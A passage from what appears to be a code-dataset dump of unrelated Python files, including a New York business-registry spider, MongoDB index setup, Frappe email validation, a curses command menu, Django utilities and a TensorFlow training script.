CustomSettings.getJobDirectory('ny_sos_companies_business_licenses'),\n 'TOP_HEADER':{ 'company_name': 'Current Entity Name',\n 'company_subtype': 'Entity Type',\n 'county': 'County',\n 'creation_date': 'Initial DOS Filing Date',\n 'dba_name': '',\n 'dos process name': 'DOS Process Name',\n 'jurisdiction': 'Jurisdiction',\n 'location name': 'Location Name',\n 'location_address_string': '',\n 'mail_address_string': 'DOS Process Address',\n 'mixed_name': '',\n 'mixed_subtype': '',\n 'permit_lic_desc': '',\n 'permit_lic_no': 'DOS ID',\n 'permit_type': '',\n 'person_address_string': ''},\n 'FIELDS_TO_EXPORT':[ \n 'permit_lic_no',\n 'company_name',\n 'dba_name',\n 'creation_date',\n 'county',\n 'jurisdiction',\n 'company_subtype',\n 'dos process name',\n 'mail_address_string',\n 'mixed_name',\n 'mixed_subtype',\n 'person_address_string',\n 'location name',\n 'location_address_string',\n 'permit_lic_desc',\n 'permit_type',\n 'url',\n 'sourceName',\n 'ingestion_timestamp'\n ],\n 'NULL_HEADERS':['jurisdiction', 'county', 'location name', 'dos process name']\n }\n\n # Do any adaptations you need here\n #def 
adapt_response(self, response):\n # return response\n\n def parse_row(self, response, row):\n data_dic={}\n data_dic['county']= row.get('County','')\n data_dic['jurisdiction']= row['Jurisdiction']\n data_dic['permit_lic_no']=row['DOS ID']\n company_name=self._getDBA(row['Current Entity Name'])\n data_dic['dos process name']= row['DOS Process Name']\n data_dic['creation_date']=row['Initial DOS Filing Date']\n data_dic['company_name']=company_name[0]\n data_dic['permit_lic_desc']='Business License for '+company_name[0] if company_name else 'Business License'\n data_dic['dba_name']=company_name[1]\n data_dic['company_subtype']= row['Entity Type'] if row['Entity Type'] else 'Business License'\n address=[]\n if row['DOS Process Address 1']:\n address.append(row['DOS Process Address 1'])\n if row['DOS Process Address 2']:\n address.append(row['DOS Process Address 2'])\n dos_address=self.format__address_4(' '.join(address),row['DOS Process City'],row['DOS Process State'],row['DOS Process Zip'])\n data_dic['mail_address_string']=dos_address\n data_dic['location name']= row['Location Name']\n locat_address=[]\n if row['Location Address 1']:\n locat_address.append(row['Location Address 1'])\n if row['Location Address 2']:\n locat_address.append(row['Location Address 2'])\n location_address=self.format__address_4(' '.join(locat_address),row['Location City'],row['Location State'],row['Location Zip'])\n data_dic['location_address_string']= location_address if location_address else (dos_address if dos_address else 'NY')\n c=0\n if row.get('CEO Name'):\n data_dic['company_name']=company_name[0] if company_name[0] else row.get('CEO Name',' ')\n il=self.save_csv(response,data_dic)\n il.add_value('mixed_name', row['CEO Name'])\n\n ceo_address=[]\n if row['CEO Address 1']:\n ceo_address.append(row['CEO Address 1'])\n if row['CEO Address 2']:\n ceo_address.append(row['CEO Address 2'])\n mix_address=self.format__address_4(' '.join(ceo_address),row['CEO City'],row['CEO State'],row['CEO Zip'])\n il.add_value('person_address_string', mix_address)\n il.add_value('mixed_subtype', 'CEO')\n c=1\n yield il.load_item()\n if row['Registered Agent Name']:\n data_dic['company_name']=company_name[0] if company_name[0] else row.get('Registered Agent Name',' ')\n il=self.save_csv(response,data_dic)\n il.add_value('mixed_name', row['Registered Agent Name'])\n c=1\n agent_address=[]\n if row['Registered Agent Address 1']:\n agent_address.append(row['Registered Agent Address 1'])\n if row['Registered Agent Address 2']:\n agent_address.append(row['Registered Agent Address 2'])\n mix_address=self.format__address_4(' '.join(agent_address),row['Registered Agent City'],row['Registered Agent State'],row['Registered Agent Zip'])\n il.add_value('person_address_string', mix_address)\n il.add_value('mixed_subtype', 'Agent')\n yield il.load_item()\n if c==0:\n yield self.save_csv(response,data_dic).load_item()\n def save_csv(self,response,data_dic):\n il = ItemLoader(item=NySosCompaniesBusinessLicensesSpiderItem())\n il.add_value('ingestion_timestamp', Utils.getingestion_timestamp())\n il.add_value('sourceName', 'NY_SOS_Companies_Business_Licenses')\n il.add_value('url', 'https://data.ny.gov/Economic-Development/Active-Corporations-Beginning-1800/n9v6-gdp6')\n il.add_value('permit_type','business_license')\n for k in data_dic:\n il.add_value(k,data_dic[k])\n return il\n # yield 
il.load_item()","sub_path":"all_spider/AI_32/ny_sos_companies_business_licenses.py","file_name":"ny_sos_companies_business_licenses.py","file_ext":"py","file_size_in_byte":7525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"423439901","text":"from __future__ import print_function\nimport itertools\nfrom pupa.core import db\nfrom .base import BaseCommand\nfrom pymongo import ASCENDING, DESCENDING\n\n\nclass Command(BaseCommand):\n name = 'ensure-indexes'\n help = '''make mongodb indexes'''\n\n def add_args(self):\n self.add_argument('collections', nargs='*',\n help='collections to index (default: all')\n self.add_argument('--purge', action='store_true', default=False,\n help='purge old indexes')\n\n def handle(self, args):\n all_indexes = {\n 'jurisdictions': [\n [('name', ASCENDING)]\n ],\n 'organizations': [],\n 'people': [],\n 'memberships': [\n # get all members for an org\n [('organization_id', ASCENDING), ('end_date', ASCENDING)],\n # get all memberships for a person\n [('person_id', ASCENDING), ('end_date', ASCENDING)],\n ],\n 'bills': [],\n 'events': [],\n 'votes': [],\n }\n api_indexes = {\n 'organizations': [\n ['jurisdiction_id'],\n ['classification'],\n ['parent_id'],\n ['division_id'],\n ['identifiers.scheme', 'identifiers.identifier'],\n [],\n ],\n 'people': [\n ['identifiers.scheme', 'identifiers.identifier'],\n [],\n ],\n 'bills': [\n ['jurisdiction_id'],\n ['identifiers.scheme', 'identifiers.identifier'],\n [],\n ],\n 'events': [\n ['jurisdiction_id'],\n ['participants.id'],\n ['agenda.related_entities.id'],\n [],\n ],\n 'votes': [\n ['jurisdiction_id'],\n ['session'],\n ['bill.id'],\n ],\n }\n\n for _type, indexes in api_indexes.items():\n for fields in indexes:\n real_index = zip(fields, itertools.repeat(ASCENDING))\n all_indexes[_type].append(real_index +\n [('created_at', DESCENDING)])\n all_indexes[_type].append(real_index +\n [('updated_at', DESCENDING)])\n if _type == 'events':\n all_indexes[_type].append(real_index +\n [('when', DESCENDING)])\n if _type == 'date':\n all_indexes[_type].append(real_index +\n [('date', DESCENDING)])\n\n collections = args.collections or all_indexes.keys()\n\n for collection in collections:\n print('indexing', collection, '...')\n current = set(db[collection].index_information().keys())\n current.discard('_id_')\n # if collection == 'bills':\n # # basic lookup / unique constraint on abbr/session/bill_id\n # current.discard('%s_1_session_1_chamber_1_bill_id_1' %\n # settings.LEVEL_FIELD)\n # db.bills.ensure_index([\n # (settings.LEVEL_FIELD, pymongo.ASCENDING),\n # ('session', pymongo.ASCENDING),\n # ('chamber', pymongo.ASCENDING),\n # ('bill_id', pymongo.ASCENDING)\n # ], unique=True)\n # print('creating level-session-chamber-bill_id index')\n print('currently has', len(current), 'indexes (not counting _id)')\n print('ensuring', len(all_indexes[collection]), 'indexes')\n ensured = set()\n for index in all_indexes[collection]:\n if isinstance(index, list):\n ensured.add(db[collection].ensure_index(index))\n elif isinstance(index, dict):\n name, index_spec = index.items()[0]\n ensured.add(\n db[collection].ensure_index(index_spec, name=name))\n else:\n raise ValueError(index)\n new = ensured - current\n old = current - ensured\n if len(new):\n print(len(new), 'new indexes:', ', '.join(new))\n if len(old):\n print(len(old), 'indexes deprecated:', ', '.join(old))\n if args.purge:\n print('removing deprecated indexes...')\n for index in old:\n 
db[collection].drop_index(index)\n","sub_path":"pupa/cli/commands/ensure_indexes.py","file_name":"ensure_indexes.py","file_ext":"py","file_size_in_byte":4657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"357385165","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and contributors\n# For license information, please see license.txt\n\nfrom __future__ import unicode_literals\nimport frappe\nfrom frappe import _\nfrom frappe.model.document import Document\nfrom frappe.utils import validate_email_address ,cint\nimport imaplib,poplib,smtplib\nfrom frappe.email.utils import get_port\n\nclass EmailDomain(Document):\n\tdef autoname(self):\n\t\tif self.domain_name:\n\t\t\tself.name = self.domain_name\n\n\tdef validate(self):\n\t\t\"\"\"Validate email id and check POP3/IMAP and SMTP connections is enabled.\"\"\"\n\t\tif self.email_id:\n\t\t\tvalidate_email_address(self.email_id, True)\n\n\t\tif frappe.local.flags.in_patch or frappe.local.flags.in_test:\n\t\t\treturn\n\n\t\tif not frappe.local.flags.in_install and not frappe.local.flags.in_patch:\n\t\t\ttry:\n\t\t\t\tif self.use_imap:\n\t\t\t\t\tif self.use_ssl:\n\t\t\t\t\t\ttest = imaplib.IMAP4_SSL(self.email_server, port=get_port(self))\n\t\t\t\t\telse:\n\t\t\t\t\t\ttest = imaplib.IMAP4(self.email_server, port=get_port(self))\n\n\t\t\t\telse:\n\t\t\t\t\tif self.use_ssl:\n\t\t\t\t\t\ttest = poplib.POP3_SSL(self.email_server, port=get_port(self))\n\t\t\t\t\telse:\n\t\t\t\t\t\ttest = poplib.POP3(self.email_server, port=get_port(self))\n\n\t\t\texcept Exception:\n\t\t\t\tfrappe.throw(_(\"Incoming email account not correct\"))\n\t\t\t\treturn None\n\t\t\tfinally:\n\t\t\t\ttry:\n\t\t\t\t\tif self.use_imap:\n\t\t\t\t\t\ttest.logout()\n\t\t\t\t\telse:\n\t\t\t\t\t\ttest.quit()\n\t\t\t\texcept Exception:\n\t\t\t\t\tpass\n\t\t\ttry:\n\t\t\t\tif self.use_tls and not self.smtp_port:\n\t\t\t\t\tself.smtp_port = 587\n\t\t\t\tsess = smtplib.SMTP((self.smtp_server or \"\").encode('utf-8'), cint(self.smtp_port) or None)\n\t\t\t\tsess.quit()\n\t\t\texcept Exception:\n\t\t\t\tfrappe.throw(_(\"Outgoing email account not correct\"))\n\t\t\t\treturn None\n\t\treturn\n\n\tdef on_update(self):\n\t\t\"\"\"update all email accounts using this domain\"\"\"\n\t\tfor email_account in frappe.get_all(\"Email Account\",\n\t\tfilters={\"domain\": self.name}):\n\n\t\t\ttry:\n\t\t\t\temail_account = frappe.get_doc(\"Email Account\",\n\t\t\t\t\temail_account.name)\n\t\t\t\temail_account.set(\"email_server\",self.email_server)\n\t\t\t\temail_account.set(\"use_imap\",self.use_imap)\n\t\t\t\temail_account.set(\"use_ssl\",self.use_ssl)\n\t\t\t\temail_account.set(\"use_tls\",self.use_tls)\n\t\t\t\temail_account.set(\"attachment_limit\",self.attachment_limit)\n\t\t\t\temail_account.set(\"smtp_server\",self.smtp_server)\n\t\t\t\temail_account.set(\"smtp_port\",self.smtp_port)\n\t\t\t\temail_account.save()\n\t\t\texcept Exception as e:\n\t\t\t\tfrappe.msgprint(email_account.name)\n\t\t\t\tfrappe.throw(e)\n\t\t\t\treturn None\n","sub_path":"frappe/email/doctype/email_domain/email_domain.py","file_name":"email_domain.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"164339602","text":"__author__ = 'Арминэ Мороз'\n\n# Задача-1:\n# Дан список фруктов.\n# Напишите программу, выводящую фрукты в виде нумерованного списка,\n# выровненного по правой стороне.\nprint('Task 1')\nfruit_list = [\"яблоко\", 
\"банан\", \"киви\", \"арбуз\"]\n\nfor fruit in fruit_list:\n print('{}. {:>6}'.format(fruit_list.index(fruit) + 1,fruit))\n# Пример:\n# Дано: [\"яблоко\", \"банан\", \"киви\", \"арбуз\"]\n# Вывод:\n# 1. яблоко\n# 2. банан\n# 3. киви\n# 4. арбуз\n\n# Подсказка: воспользоваться методом .format()\n\nprint('Task 2')\n# Задача-2:\n# Даны два произвольные списка.\n# Удалите из первого списка элементы, присутствующие во втором списке и выведите результат.\nrandom_list1 = [7, 9.6, 'word', 86, 'smth', 1.8, 'dunno', 7, 53, 7, 7.6, 'oh7']\nrandom_list2 = ['look', 'string', 7, 'stock', 90, 1.8, 'smth']\n\nfor el_2 in random_list2:\n for el_1 in random_list1:\n if el_1 == el_2:\n random_list1.remove(el_1)\n else:\n continue\n\nprint(random_list1)\n\nprint('Task 3')\n# Задача-3:\n# Дан произвольный список из целых чисел.\n# Получите НОВЫЙ список из элементов исходного, выполнив следующие условия:\n# если элемент кратен двум, то разделить его на 4, если не кратен, то умножить на два.\n# и выведите результат\n\ninteger_list = [7, 96, 80, 7, -53, 6, 41, -22]\ninteger_new_list = []\n\nfor i in integer_list:\n if i%2 == 0:\n i = i/4\n integer_new_list.append(i)\n else:\n i = i*2\n integer_new_list.append(i)\n\nprint(integer_new_list)","sub_path":"lesson02_easy.py","file_name":"lesson02_easy.py","file_ext":"py","file_size_in_byte":1971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"170492308","text":"import math\n\ndef f(z):\n return math.log(z)+z\n\ndef search_local_section(a, h):\n b = a + h\n fa = f(a)\n fb = f(b)\n if (abs(fb) > abs(fa))&(fa * fb > 0):\n h = - h\n b = a + h\n fb = f(b)\n while fa * fb > 0:\n a = b\n b = a + h\n fa = f(a)\n fb = f(b)\n return b\n\ndef iterate(a, b, eps):\n while True:\n x = (b + a)/2\n fa = f(a)\n fx = f(x)\n if fx * fa > 0:\n a = x\n else:\n b = x\n if abs(fx) < eps:\n return x\n\n\nif __name__ == '__main__':\n a = 0.1\n h = 0.1\n eps = 0.01\n x = iterate(a, search_local_section(a, h), eps)\n print(str(x))\n res = f(x)\n print(str(res))","sub_path":"lab2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"30628035","text":"import sys\nimport curses\nfrom curses import panel\nimport csv\nimport os\n\nglobal target\ntarget = \"\"\n\nglobal current_title\ncurrent_title = \"\"\n\nglobal title_to_cmd\ntitle_to_cmd = dict()\n\nclass Menu(object):\n\n def __init__(self, items, stdscreen):\n #TODO auto detect letters and bind letter to the item\n # make new container auto turned into\n # [m]ake new container\n\n self.window = stdscreen.subwin(0,0)\n self.window.keypad(1)\n self.panel = panel.new_panel(self.window)\n self.panel.hide()\n panel.update_panels()\n global target\n self.target = target\n\n self.position = 0\n\n #get numbers to exectue\n self.numbers_to_listen_to = list(range(1,len(items)+2))\n self.numbers_to_listen_to = list(range(1,len(items)+2))\n if len(self.numbers_to_listen_to) > 9:\n self.numbers_to_listen_to = self.numbers_to_listen_to[:9]\n\n self.letters_to_listen_to = []\n\n self.temp_items = []\n for item in items:\n i = 0\n title = item[0]\n next_item = False\n for letter in title:\n\n if not (letter.lower() in set(self.letters_to_listen_to)) and (not next_item):\n self.letters_to_listen_to.append(letter.lower())\n\n new_title = str(title[:i])+\"[\"+letter+\"]\"+str(title[i+1:])\n self.temp_items.append((new_title,item[1]))\n\n\n next_item = True\n break\n i+=1\n\n self.items = 
self.temp_items\n\n runner = sys_runner()\n self.items.append(('exit',runner.exit))\n\n def navigate(self, n):\n self.position += n\n if self.position < 0:\n self.position = 0\n elif self.position >= len(self.items):\n self.position = len(self.items)-1\n\n def get_target(self):\n #TODO make rm the .json or .csv and just name of what the menu is\n return str(self.target)\n\n def display(self):\n self.panel.top()\n self.panel.show()\n self.window.clear()\n self.window.addstr(\" \"+os.path.basename(self.get_target()).replace(\".csv\",\"\"))\n global current_title\n\n while True:\n self.window.refresh()\n curses.doupdate()\n for index, item in enumerate(self.items):\n if index == self.position:\n mode = curses.A_REVERSE\n else:\n mode = curses.A_NORMAL\n\n msg = '%d. %s' % (index+1, item[0])\n self.window.addstr(2+index, 1, msg, mode)\n\n key = self.window.getch()\n\n if key in [curses.KEY_ENTER, ord('\\n')]:\n if self.position == len(self.items)-1:#if its the exit button\n break\n else:\n #TODO make it call a thing instead\n\n #TODO 1st make it print what the cmd is\n self.target = self.items[self.position]\n #print(self.target)\n current_title = self.items[self.position][0]\n self.items[self.position][1]()\n\n elif key == curses.KEY_UP:\n self.navigate(-1)\n\n elif key == curses.KEY_DOWN:\n self.navigate(1)\n\n else:\n #print(\"key was\",key)\n #print(self.letters_to_listen_to)\n #print(self.numbers_to_listen_to)\n #print(self.items)\n for n in self.numbers_to_listen_to:\n if key == ord(str(n)):\n #print(\"dIng\")\n #print(self.position)\n #run item at n\n current_title = self.items[n-1][0]\n self.items[n-1][1]()\n\n for l in self.letters_to_listen_to:\n if key == ord(str(l)):\n # print(\"dIng\")\n # print(self.position)\n # run item at n\n current_title = self.items[self.letters_to_listen_to.index(l)][0]\n self.items[self.letters_to_listen_to.index(l)][1]()\n\n #if key in [for n in self.numbers_to_listen_to:ord(n)]\n\n self.window.clear()\n self.panel.hide()\n panel.update_panels()\n curses.doupdate()\n\nclass csv_shit(object):\n def write_test(self):\n with open('eggs.csv', 'w', newline='') as csvfile:\n spamwriter = csv.writer(csvfile, delimiter=' ',\n quotechar='|', quoting=csv.QUOTE_MINIMAL)\n spamwriter.writerow(['Spam'] * 5 + ['Baked Beans'])\n spamwriter.writerow(['Spam', 'Lovely Spam', 'Wonderful Spam'])\n\n def read(self,file_to_read):\n titles = []\n cmds = []\n #stay_in_menu = []\n\n with open(file_to_read, newline='') as csvfile:\n reader = csv.reader(csvfile, delimiter=',')\n print(\"contents of two.csv\")\n for row in reader:\n titles.append(row[0])\n cmds.append(row[1])\n #stay_in_menu.append([2])\n title_to_cmd[row[0]] = row[1]\n print(''.join(row))\n\n return titles,cmds#,stay_in_menu\n\n def make_menu(self,titles,cmds):\n runner = sys_runner()\n menu_items = []\n #TODO make menu objects callable things\n for title,cmd in zip(titles,cmds):\n temp_tuple = (str(title),runner.run)\n menu_items.append(temp_tuple)\n return menu_items\n\n\nclass sys_runner(object):\n def run(self,stay_in_menu=0):\n #TODO if stay in menu then print output in display fucntion\n # if not then exit menu and run\n print(\"running\")\n global current_title,title_to_cmd\n #put title back to normal\n current_title = current_title.replace(\"[\",\"\").replace(\"]\",\"\")\n print(current_title)\n print(title_to_cmd[current_title])\n\n #if there are arguments to pass to scrpts do it\n command_to_write = title_to_cmd[current_title]\n if len(sys.argv) > 2:\n args_to_add = sys.argv[2:]\n command_to_write+=\" 
\"+\" \".join(args_to_add)\n print(command_to_write)\n with open(\"temp\",\"w\") as temp:\n temp.write(str(command_to_write))\n temp.close()\n exit(0)\n #TODO make it make temp\n\n\n def exit(self):\n exit(0)\n return\n\nclass MyApp(object):\n\n def __init__(self, stdscreen):\n self.screen = stdscreen\n curses.curs_set(0)\n\n csv_obj = csv_shit()\n\n titles, cmds = csv_obj.read(target)\n menu_items = csv_obj.make_menu(titles, cmds)\n\n main_menu = Menu(menu_items, self.screen)\n main_menu.display()\n\n\n\nif __name__ == '__main__':\n #TODO make pass any args onwards\n #print (\"This is the name of the script: \", sys.argv[0])\n #print(\"all args are\",sys.argv)\n if len(sys.argv) >= 2:\n target = sys.argv[1]\n curses.wrapper(MyApp)\n else:\n print(\"Must specify a csv to menu\")","sub_path":"menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":7126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"592220793","text":"# implement the simplest way of selecting the k-th minimum\nimport sys, os, time, random\nif os.getcwd() not in sys.path:\n sys.path.append(os.getcwd())\n\nfrom k_min_count import Kmin\nfrom k_min import KMin\n\n\n##a = [5, 2, 3, 6, 1, 4]\n##k = 6\n\nfor i in range(1,7):\n o = 10**i\n a = random.sample(range(o*2), o)\n k = int(random.random()*i*10) + 1\n\n\n s = time.clock()\n by_count = Kmin.kthM(a, k)\n ec = round(time.clock() - s, 5)\n \n t = time.clock()\n by_heap = KMin.kthMinimum(a, k)\n eh = round(time.clock() - t, 5)\n\n if by_count != by_heap:\n print ('ERROR')\n else:\n print (o, k, ec, eh)\n","sub_path":"week2/7-K-Min/benchmark/k_min_test.py","file_name":"k_min_test.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"398922265","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.db.models.signals import post_save\nfrom django.db.models.base import ModelBase\nfrom django.utils.safestring import mark_safe\nfrom django.template.defaultfilters import yesno, linebreaksbr, urlize\nfrom django.utils.formats import get_format\nfrom django.utils.text import capfirst\nfrom django.utils import dateformat\nfrom django.template.defaultfilters import slugify\nimport datetime, re, logging, random, string, os\n\ntry:\n from collections import namedtuple\nexcept ImportError:\n # Python 2.4, 2.5 backport:\n # http://code.activestate.com/recipes/500261/\n from artminster.core.utils.namedtuple import namedtuple\n\ndef get_namedtuple_choices(name, choices_tuple):\n \"\"\"Factory function for quickly making a namedtuple suitable for use in a\n Django model as a choices attribute on a field. 
It will preserve order.\n\n Usage::\n\n class MyModel(models.Model):\n COLORS = get_namedtuple_choices('COLORS', (\n (0, 'BLACK', 'Black'),\n (1, 'WHITE', 'White'),\n ))\n colors = models.PositiveIntegerField(choices=COLORS)\n\n >>> MyModel.COLORS.BLACK\n 0\n >>> MyModel.COLORS.get_choices()\n [(0, 'Black'), (1, 'White')]\n \"\"\"\n class Choices(namedtuple(name, [name for val,name,desc in choices_tuple])):\n __slots__ = ()\n _choices = tuple([desc for val,name,desc in choices_tuple])\n\n def get_choices(self):\n return zip(tuple(self), self._choices)\n\n return Choices._make([val for val,name,desc in choices_tuple])\n\ndef unique_slugify(instance, value, slug_field_name='slug', queryset=None, slug_separator='-'):\n \"\"\"\n Calculates a unique slug of ``value`` for an instance.\n\n ``slug_field_name`` should be a string matching the name of the field to\n store the slug in (and the field to check against for uniqueness).\n\n ``queryset`` usually doesn't need to be explicitly provided - it'll default\n to using the ``.all()`` queryset from the model's default manager.\n \"\"\"\n slug_field = instance._meta.get_field(slug_field_name)\n\n slug = getattr(instance, slug_field.attname)\n slug_len = slug_field.max_length\n\n # Sort out the initial slug. Chop its length down if we need to.\n slug = slugify(value)\n if slug_len:\n slug = slug[:slug_len]\n slug = _slug_strip(slug, slug_separator)\n original_slug = slug\n\n # Create a queryset, excluding the current instance.\n if queryset is None:\n queryset = instance.__class__._default_manager.all()\n if instance.pk:\n queryset = queryset.exclude(pk=instance.pk)\n\n # Find a unique slug. If one matches, at '-2' to the end and try again\n # (then '-3', etc).\n next = 2\n while not slug or queryset.filter(**{slug_field_name: slug}):\n slug = original_slug\n end = '-%s' % next\n if slug_len and len(slug) + len(end) > slug_len:\n slug = slug[:slug_len-len(end)]\n slug = _slug_strip(slug, slug_separator)\n slug = '%s%s' % (slug, end)\n next += 1\n \n setattr(instance, slug_field.attname, slug)\n\ndef _slug_strip(value, separator=None):\n \"\"\"\n Cleans up a slug by removing slug separator characters that occur at the\n beginning or end of a slug.\n\n If an alternate separator is used, it will also replace any instances of\n the default '-' separator with the new separator.\n \"\"\"\n if separator == '-' or not separator:\n re_sep = '-'\n else:\n re_sep = '(?:-|%s)' % re.escape(separator)\n value = re.sub('%s+' % re_sep, separator, value)\n return re.sub(r'^%s+|%s+$' % (re_sep, re_sep), '', value)\n\ndef get_or_none(model, **kwargs):\n try:\n return model.objects.get(**kwargs)\n except model.DoesNotExist:\n return None\t\t\n\ndef get_upload_to(instance, path, filename):\n name, ext = os.path.splitext(filename)\n name = ''.join(random.choice(string.ascii_lowercase + string.digits) for x in range(20))\n new_filename = '%s%s' % (name, ext.lower())\n return os.path.join(path, new_filename)","sub_path":"core/utils/model_utils.py","file_name":"model_utils.py","file_ext":"py","file_size_in_byte":4135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"310476758","text":"# -*- coding: utf-8 -*-\n# Part of Odoo. 
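# (Editor's note on unique_slugify() from the preceding file: a behavioural
#  sketch with a hypothetical Article model, not code from either project.
#
#      Article.objects.create(title='Hello World')  # slug -> 'hello-world'
#      Article.objects.create(title='Hello World')  # slug -> 'hello-world-2'
#      Article.objects.create(title='Hello World')  # slug -> 'hello-world-3'
#
#  The numeric suffixes come from the `while ... queryset.filter(...)` loop,
#  which also re-trims the base slug so slug plus suffix never exceeds the
#  field's max_length.)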
See LICENSE file for full copyright and licensing details.\n\nfrom odoo import api, fields, models\n\n\nclass ResConfigSettings(models.TransientModel):\n _inherit = 'res.config.settings'\n\n @api.model\n def execute_config(self):\n config_id = self.env['res.config.settings'].search([], limit=1, order='id desc')\n if config_id:\n config_rec = self.env['res.config.settings'].browse(config_id.id)\n config_rec.write({\n 'group_stock_multi_locations': True,\n 'group_stock_multi_warehouses': True,\n 'group_stock_production_lot': True,\n 'group_product_variant': True,\n 'group_stock_adv_location': True,\n })\n config_rec.execute()\n else:\n config_params = self.env['res.config.settings'].create({})\n config_params.write({\n 'group_stock_multi_locations': True,\n 'group_stock_multi_warehouses': True,\n 'group_stock_production_lot': True,\n 'group_product_variant': True,\n 'group_stock_adv_location': True,\n })\n config_params.execute()\n","sub_path":"manage/models/res_config_settings_models.py","file_name":"res_config_settings_models.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"35486420","text":"import os\nimport importlib\nimport argparse\nimport sys\nimport pathlib\nimport pickle\nimport numpy as np\nfrom time import strftime\nfrom shutil import copyfile\nimport gzip\n\nimport tensorflow as tf\nimport tensorflow.contrib.eager as tfe\n\nimport utilities\nfrom utilities import log\n\n\ndef load_batch(sample_files):\n \"\"\"\n Loads and concatenates a bunch of samples into one mini-batch.\n \"\"\"\n c_features = []\n e_indices = []\n e_features = []\n v_features = []\n cand_actionss = []\n expert_actions = []\n\n # load samples\n for filename in sample_files:\n with gzip.open(filename, 'rb') as f:\n sample = pickle.load(f)\n\n state, khalil_state, expert_action, cand_actions, *_ = sample['data']\n\n cand_actions = np.array(cand_actions)\n expert_action = np.where(cand_actions == expert_action)[0][0] # best action relative to candidates\n\n c, e, v = state\n c_features.append(c['values'])\n e_indices.append(e['indices'])\n e_features.append(e['values'])\n v_features.append(v['values'])\n expert_actions.append(expert_action)\n cand_actionss.append(cand_actions)\n\n n_cs_per_sample = [c.shape[0] for c in c_features]\n n_vs_per_sample = [v.shape[0] for v in v_features]\n n_cands_per_sample = [cands.shape[0] for cands in cand_actionss]\n\n # concatenate samples in one big graph\n c_features = np.concatenate(c_features, axis=0)\n v_features = np.concatenate(v_features, axis=0)\n e_features = np.concatenate(e_features, axis=0)\n # edge indices have to be adjusted accordingly\n cv_shift = np.cumsum([\n [0] + n_cs_per_sample[:-1],\n [0] + n_vs_per_sample[:-1]\n ], axis=1)\n e_indices = np.concatenate([e_ind + cv_shift[:, j:(j+1)]\n for j, e_ind in enumerate(e_indices)], axis=1)\n # candidate indexes as well\n cand_actionss = np.concatenate([cands + shift\n for cands, shift in zip(cand_actionss, cv_shift[1])])\n expert_actions = np.array(expert_actions)\n\n # convert to tensors\n c_features = tf.convert_to_tensor(c_features, dtype=tf.float32)\n e_indices = tf.convert_to_tensor(e_indices, dtype=tf.int32)\n e_features = tf.convert_to_tensor(e_features, dtype=tf.float32)\n v_features = tf.convert_to_tensor(v_features, dtype=tf.float32)\n n_cs_per_sample = tf.convert_to_tensor(n_cs_per_sample, dtype=tf.int32)\n n_vs_per_sample = tf.convert_to_tensor(n_vs_per_sample, dtype=tf.int32)\n expert_actions = 
tf.convert_to_tensor(expert_actions, dtype=tf.int32)\n cand_actionss = tf.convert_to_tensor(cand_actionss, dtype=tf.int32)\n n_cands_per_sample = tf.convert_to_tensor(n_cands_per_sample, dtype=tf.int32)\n\n return c_features, e_indices, e_features, v_features, n_cs_per_sample, n_vs_per_sample, n_cands_per_sample, cand_actionss, expert_actions\n\n\ndef load_batch_tf(x):\n return tf.py_func(\n load_batch,\n [x],\n [tf.float32, tf.int32, tf.float32, tf.float32, tf.int32, tf.int32, tf.int32, tf.int32, tf.int32])\n\n\ndef pretrain(model, dataloader):\n \"\"\"\n Pre-normalizes a model (i.e., PreNormLayer layers) over the given samples.\n\n Parameters\n ----------\n model : model.BaseModel\n A base model, which may contain some model.PreNormLayer layers.\n dataloader : tf.data.Dataset\n Dataset to use for pre-training the model.\n Return\n ------\n number of PreNormLayer layers processed.\n \"\"\"\n model.pre_train_init()\n i = 0\n while True:\n for batch in dataloader:\n c, ei, ev, v, n_cs, n_vs, n_cands, cands, actions = batch\n batched_states = (c, ei, ev, v, n_cs, n_vs)\n\n if not model.pre_train(batched_states):\n break\n\n res = model.pre_train_next()\n if res is None:\n break\n else:\n layer, name = res\n\n i += 1\n\n return i\n\n\ndef process(model, dataloader, top_k, optimizer=None):\n mean_loss = 0\n mean_kacc = np.zeros(len(top_k))\n\n n_samples_processed = 0\n for batch in dataloader:\n c, ei, ev, v, n_cs, n_vs, n_cands, cands, actions = batch\n batched_states = (c, ei, ev, v, tf.reduce_sum(n_cs, keepdims=True), tf.reduce_sum(n_vs, keepdims=True)) # prevent padding\n batch_size = len(n_cs.numpy())\n\n if optimizer:\n with tf.GradientTape() as tape:\n logits = model(batched_states)\n logits = tf.expand_dims(tf.gather(tf.squeeze(logits, 0), cands), 0) # filter candidate variables\n logits = model.pad_output(logits, n_cands.numpy()) # apply padding now\n loss = tf.losses.sparse_softmax_cross_entropy(labels=actions, logits=logits)\n grads = tape.gradient(target=loss, sources=model.variables)\n optimizer.apply_gradients(zip(grads, model.variables))\n else:\n logits = model(batched_states)\n logits = tf.expand_dims(tf.gather(tf.squeeze(logits, 0), cands), 0) # filter candidate variables\n logits = model.pad_output(logits, n_cands.numpy()) # apply padding now\n loss = tf.losses.sparse_softmax_cross_entropy(labels=actions, logits=logits)\n\n kacc = np.array([\n tf.reduce_mean(tf.cast(tf.nn.in_top_k(predictions=logits, targets=actions, k=k), tf.float32)).numpy()\n for k in top_k\n ])\n mean_loss += loss.numpy() * batch_size\n mean_kacc += kacc * batch_size\n n_samples_processed += batch_size\n\n mean_loss /= n_samples_processed\n mean_kacc /= n_samples_processed\n\n return mean_loss, 